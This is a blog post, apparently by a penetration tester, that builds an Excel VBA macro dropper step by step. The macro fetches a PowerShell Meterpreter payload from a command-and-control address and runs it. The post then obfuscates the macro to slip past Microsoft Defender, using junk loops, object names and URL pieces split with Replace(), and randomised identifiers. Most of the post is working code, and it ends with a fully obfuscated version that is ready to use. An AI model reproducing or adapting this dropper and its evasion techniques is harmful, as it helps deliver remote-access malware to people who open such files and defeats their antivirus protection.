Malware Project - Almost Bypass MsDefender

Disclaimer : Hello This is actually my first real Macro while trying to obfuscate and ByPass Defender (Sort Of) ! This Code will escape Defender but the remote payload will not since it was a Meterpreter PowerShell, maybe in the next part 👨‍💻

 
Someone asked me to create a file that contains a Macro for downloading a malicious file while evading Defender ! Here is my first attempt, it was cool and might create more with more elaborate code ! Enjoy

Raw Code, no obfuscation

First of all, before trying to obfuscate a VBA code you might need a working code !

Here is a piece of code I used to download my payload form a C2 server :

Private Sub CommandButton1_Click() # Using a Excel ActivateX Button
    DownloadFileFromURL # Call the DownloadFileFromURL function
    Dim myoutputfile As Integer #Actually not using those 2 variable at the end 🤣
    Dim FilePath As String
    Shell ("powershell.exe -noexit .\\payload.ps1") # Execution of the PowerShell Payload (Here simple meterpreter)
End Sub

Sub DownloadFileFromURL()
    Set objXMLHTTP = CreateObject("Microsoft.XMLHTTP") # Call Windows Objects
    Set objADODBStream = CreateObject("ADODB.Stream")
    objXMLHTTP.Open "GET", "http://192.168.1.10:8080/payload.txt", False # IP or ULR of the C2 and the payload as a TXT file
    objXMLHTTP.Send
    objADODBStream.Type = 1
    objADODBStream.Open
    objADODBStream.Write objXMLHTTP.responseBody
    objADODBStream.savetofile "payload.ps1", 2 # Save the TXT into a PS1 Script
End Sub

So, this is not a big and fancy code here but it works ! AT this point Defender will beat the sh*t out of your file so, be careful !

First Stage - Non-sense Code

In this first stage I have a working code, but I whan to “lure” Defender by Adding random and non-sense code that’s doing nothing at all.
Here I choose to use while loop everywhere like this

Dim t
t = 1
Do While t < 2
t = t + 1
Loop

Here is an example of what it looks like :

Private Sub CommandButton1_Click()
Dim y,x,c,v,f,g,h
y = 1
Do While y < 2
y = y + 1
Loop

    DownloadFileFromURL
    Dim myoutputfile As Integer
    Dim FilePath As String
    Shell ("powershell.exe -noexit .\\payload.ps1")
End Sub

Sub DownloadFileFromURL()

Dim t,q,w,e,r,a,s
t = 1
Do While t < 5
t = t + 1
Loop

    Set objXMLHTTP = CreateObject("Microsoft.XMLHTTP")
    Set objADODBStream = CreateObject("ADODB.Stream")
    objXMLHTTP.Open "GET", "http://192.168.1.10:8080/payload.txt", False
    objXMLHTTP.Send
    objADODBStream.Type = 1
    objADODBStream.Open
    objADODBStream.Write objXMLHTTP.responseBody
    objADODBStream.savetofile "payload.ps1", 2
End Sub

This kind of code is also used to make the reverse of the malware very difficult for the analyst.

Second Stage - Obfuscate the Objects

While thinking about my code and a way to turn it into more garbage, I decided to hide the MS Objects called in the Download Function.

This kind of call are automatically trigger as malicious since there are mostly used by malwares, so I found a way to hide them in the code using the Replace() function.

Here is a simple Example

A = "Mic00000ft"
B = Replace(A,"00000","roso")

In this example, the B variable will contains “Microsoft” since I replace the “00000” by the rest of the word and I can use the variable B inside CreateObject().

Here is what it looks like ( I place some 0000 just to avoid the mess in this code block but you can put any random string you want and it’s better)

    q = "Mic00000000000000000000000000000ft"
    w = Replace(q,"00000000000000000000000000000","roso")
    e = "XM00000000000000000000000000000TP" 
    r = Replace(e,"00000000000000000000000000000","LHT")

    a = "AD00000000000000000000000000000B"
    s = Replace(a,"00000000000000000000000000000","OD")
    b = "St00000000000000000000000000000am"
    n = Replace(b,"00000000000000000000000000000","re")

    Set objXMLHTTP = CreateObject(w & "." & r)
    Set objADODBStream = CreateObject(s & "." & n)

Don’t forget to hide the URL as well:

    qq = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
    ww = Replace(qq,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
    ee = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
    rr = Replace(ee,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
    pp = "pay0000000000000000000d"
    kk = Replace(pp,"0000000000000000000","loa")

    objXMLHTTP.Open "GET", "http://" & ww & ":" & rr & "/" & kk & ".txt", False
    objXMLHTTP.Send

Of course there are many may ways to hide data like this, I’m using the simplest way possible right now

Hide that Shell !

One of the most triggered function is the Shell command ! But there are many ways to bypass Defender and not directly use this command.

Set Shell = CreateObject("WScript.Shell")
Shell.Run("whoami")

Like the previous objects, we’ll use the same method to hide the WScript Object.

x = "WS0000000000000000000000000pt"
    c = Replace(x,"0000000000000000000000000","cri")
    v = "Sh0000000000000000000000000l"
    f = Replace(v,"0000000000000000000000000","el")

    Set Shell = CreateObject(c & "." & f)
    Shell.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\\pa" & "yloa" & "d.ps1")

I aslso divided the powershell command so it’s not directy written on the script

Last Stage - Random names

The final stage at that point si just to use random strings as function name or variables.
For that part i’m using an Online tool called Code Protection an I just need to mention all the name I want to replace in this code.

Here is the code without random strings:

Private Sub CommandButton1_Click()
Dim y,x,c,v,f,g,h
y = 1
Do While y < 2
y = y + 1
Loop
    DownloadFileFromURL
    Dim myoutputfile As Integer
    Dim FilePath As String
    x = "WS0000000000000000000000000pt"
    c = Replace(x,"0000000000000000000000000","cri")
    v = "Sh0000000000000000000000000l"
    f = Replace(v,"0000000000000000000000000","el")
    Set Shell = CreateObject(c & "." & f)
    Shell.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\\pa" & "yloa" & "d.ps1")
End Sub

Sub DownloadFileFromURL()
Dim t,q,w,e,r,a,s,b,n,qq,ww,ee,rr,pp,kk
t = 1
Do While t < 5
t = t + 1
Loop
    q = "Mic00000000000000000000000000000ft"
    w = Replace(q,"00000000000000000000000000000","roso")
    e = "XM00000000000000000000000000000TP" 
    r = Replace(e,"00000000000000000000000000000","LHT")
    a = "AD00000000000000000000000000000B"
    s = Replace(a,"00000000000000000000000000000","OD")
    b = "St00000000000000000000000000000am"
    n = Replace(b,"00000000000000000000000000000","re")
    Set objXMLHTTP = CreateObject(w & "." & r)
    Set objADODBStream = CreateObject(s & "." & n)
    qq = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
    ww = Replace(qq,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
    ee = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
    rr = Replace(ee,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
    pp = "pay0000000000000000000d"
    kk = Replace(pp,"0000000000000000000","loa")
    objXMLHTTP.Open "GET", "http://" & ww & ":" & rr & "/" & kk & ".txt", False
    objXMLHTTP.Send
    objADODBStream.Type = 1
    objADODBStream.Open
    objADODBStream.Write objXMLHTTP.responseBody
    objADODBStream.savetofile "payload.ps1", 2
End Sub

ANd here is the finale code with “full” obfuscation:

Private Sub CommandButton1_Click()
Dim nf7d7aafa614ae2e12b395d5df9ee4929,y5e2e19a97c2f321d8ce6e7ff6497d702,y701c18a7c7d41871239961947e31b2cd,ef34bc76f2d314271e34337eab2eb2cd2,qc0cc6e49592dec80416d6a3da9f01597,beb81d1e85adc52615465c469a1c20bab,xcd4143bfd53557b1234092d59353cfe5
nf7d7aafa614ae2e12b395d5df9ee4929 = 1
Do While nf7d7aafa614ae2e12b395d5df9ee4929 < 2
nf7d7aafa614ae2e12b395d5df9ee4929 = nf7d7aafa614ae2e12b395d5df9ee4929 + 1
Loop
t0894a182edb305bfc894f9a0d77ae549
Dim b8da5de0cf00af37347314a034ce6ac76 As Integer
Dim bcf9563044e940bcb370186ece0207409 As String
y5e2e19a97c2f321d8ce6e7ff6497d702 = "WS0000000000000000000000000pt"
y701c18a7c7d41871239961947e31b2cd = Replace(y5e2e19a97c2f321d8ce6e7ff6497d702,"0000000000000000000000000","cri")
ef34bc76f2d314271e34337eab2eb2cd2 = "Sh0000000000000000000000000l"
qc0cc6e49592dec80416d6a3da9f01597 = Replace(ef34bc76f2d314271e34337eab2eb2cd2,"0000000000000000000000000","el")
Set qe46fdc45ae3a5515584f4d44a8b8b2df = CreateObject(y701c18a7c7d41871239961947e31b2cd & "." & qc0cc6e49592dec80416d6a3da9f01597)
qe46fdc45ae3a5515584f4d44a8b8b2df.run ("po" & "wers" & "hell" & ".ex" & "e -noex" & "it .\\pa" & "yloa" & "d.ps1")
End Sub
Sub t0894a182edb305bfc894f9a0d77ae549()
Dim e97b8956a358b260b24afd06d64494c4d,yffcbe4af74f35a61ac88aaa0d41c9d86,e1c09f164c1c3bf60b15c09b54cf7a8b8,e5c068c60001ee2d4009beea3ad32b6e1,nfe31c02a86912d80a6cceb7de2c789ec,c17fea5c0191a5bc3c2640b8f16b14e98,y560c5fa7e5f4ddabb1dea7096c30fbb3,ea06f6764676da2a53039a8c582369215,vd788acd2ab98604acf912471d7b2c47d,ec8a6296f4b0f1b2953f0f43b25d28c20,bed6dad1b0c47ef9d6216c7e497e4fe06,q2df3664a88d9cc00cc1292b9cfc38a51,b860812e2b3f298fda368e6ddfcab2411,x3a75ddb3e3822fdc37a0501d9420704e,r69ab3e7a1c107402489ab3fd7b058463
e97b8956a358b260b24afd06d64494c4d = 1
Do While e97b8956a358b260b24afd06d64494c4d < 5
e97b8956a358b260b24afd06d64494c4d = e97b8956a358b260b24afd06d64494c4d + 1
Loop
yffcbe4af74f35a61ac88aaa0d41c9d86 = "Mic00000000000000000000000000000ft"
e1c09f164c1c3bf60b15c09b54cf7a8b8 = Replace(yffcbe4af74f35a61ac88aaa0d41c9d86,"00000000000000000000000000000","roso")
e5c068c60001ee2d4009beea3ad32b6e1 = "XM00000000000000000000000000000TP"
nfe31c02a86912d80a6cceb7de2c789ec = Replace(e5c068c60001ee2d4009beea3ad32b6e1,"00000000000000000000000000000","LHT")
c17fea5c0191a5bc3c2640b8f16b14e98 = "AD00000000000000000000000000000B"
y560c5fa7e5f4ddabb1dea7096c30fbb3 = Replace(c17fea5c0191a5bc3c2640b8f16b14e98,"00000000000000000000000000000","OD")
ea06f6764676da2a53039a8c582369215 = "St00000000000000000000000000000am"
vd788acd2ab98604acf912471d7b2c47d = Replace(ea06f6764676da2a53039a8c582369215,"00000000000000000000000000000","re")
Set q7089b94b9f9e338b5cdc57f6a3245c47 = CreateObject(e1c09f164c1c3bf60b15c09b54cf7a8b8 & "." & nfe31c02a86912d80a6cceb7de2c789ec)
Set r6deb5e78454a0af561242cf3d291aa21 = CreateObject(y560c5fa7e5f4ddabb1dea7096c30fbb3 & "." & vd788acd2ab98604acf912471d7b2c47d)
ec8a6296f4b0f1b2953f0f43b25d28c20 = "192.4545.2323.45879.56.17.47871.17.4.45454.17.10"
bed6dad1b0c47ef9d6216c7e497e4fe06 = Replace(ec8a6296f4b0f1b2953f0f43b25d28c20,"4545.2323.45879.56.17.47871.17.4.45454.17","168.1")
q2df3664a88d9cc00cc1292b9cfc38a51 = "80s45s65d4s2a32sd4s5f4s6d4a3f45f78s0"
b860812e2b3f298fda368e6ddfcab2411 = Replace(q2df3664a88d9cc00cc1292b9cfc38a51,"s45s65d4s2a32sd4s5f4s6d4a3f45f78s","8")
x3a75ddb3e3822fdc37a0501d9420704e = "pay0000000000000000000d"
r69ab3e7a1c107402489ab3fd7b058463 = Replace(x3a75ddb3e3822fdc37a0501d9420704e,"0000000000000000000","loa")
q7089b94b9f9e338b5cdc57f6a3245c47.Open "GET", "http://" & bed6dad1b0c47ef9d6216c7e497e4fe06 & ":" & b860812e2b3f298fda368e6ddfcab2411 & "/" & r69ab3e7a1c107402489ab3fd7b058463 & ".txt", False
q7089b94b9f9e338b5cdc57f6a3245c47.Send
r6deb5e78454a0af561242cf3d291aa21.Type = 1
r6deb5e78454a0af561242cf3d291aa21.Open
r6deb5e78454a0af561242cf3d291aa21.Write q7089b94b9f9e338b5cdc57f6a3245c47.responseBody
r6deb5e78454a0af561242cf3d291aa21.savetofile "payload.ps1", 2
End Sub

Hope you enjoy this little post, I’ll try to write a next part with the “evasion” of the last stage, the execution of the reverse shell !

Thanks !

This article was updated on 15 August 2023

AlrikRr

Formerly a firefighter in France 🇫🇷 🚒, I decided to pursue my passion for IT and especially offensive cybersecurity. Now a Pentester in Montreal 🇨🇦 for almost 3 years and an active member of HackersWithoutBorders North America, I am gradually specializing in internal and network intrusion testing.

Sharing our passion for this field, whether for awareness or education, is an important mission for me!

Feel free to contact me to discuss cyber or anything else over a beer :D 🍻